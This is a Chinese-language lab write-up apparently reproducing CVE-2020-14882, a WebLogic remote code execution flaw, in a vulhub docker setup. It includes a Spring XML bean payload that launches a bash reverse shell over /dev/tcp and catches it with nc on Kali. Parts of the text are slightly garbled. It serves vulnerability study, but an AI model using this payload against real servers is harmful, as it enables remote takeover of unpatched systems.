CVE-2020-14882漏洞复现(反弹shell)
⼀、漏洞描述
2020年10⽉28⽇,Oracle发布的10⽉安全更新中的Oracle WebLogic Server 远程代码执⾏漏洞(CVE-2020-14882)POC被公开,远程攻击者可以通过发送恶意的影响版本
WebLogic 10.3.6.0.0
cve漏洞库WebLogic 12.1.3.0.0
WebLogic 12.2.1.3.0
WebLogic 12.2.1.4.0
WebLogic 14.1.1.0.0
⼆、漏洞环境搭建
需要准备的⼯具如下:
1.docker+vulhub漏洞库
2.kali虚拟机
3.靶机Ubuntu18.04虚拟机(其他也可以)
4.Burpsuite
打开Ubuntu虚拟机,有docker环境和vulhub漏洞库的话就直接进⼊环境,没有的话先安装docker和下载vulhub漏洞库(⽹上教程很多,这⾥就
不多介绍了)
root@admin666-virtual-machine:~/vulhub/weblogic/CVE-2020-14882#
执⾏命令 docker-compose up -d
root@admin666-virtual-machine:~/vulhub/weblogic/CVE-2020-14882# docker-compose up -d
三、漏洞利⽤
漏洞2:
利⽤xml反弹shell
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="/schema/beans"
xmlns:xsi="/2001/XMLSchema-instance"
xsi:schemaLocation="/schema/beans /schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<value><![CDATA[bash -i >& /dev/tcp/ip/port 0>&1]]></value>
</list>
</constructor-arg>
</bean>
</beans>
⽽后打开kali,访问构造好的payload(这⾥将包放在Burp中),使⽤nc监听反弹端⼝即可成功反弹shell
四、关闭docker环境
docker-compose down
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论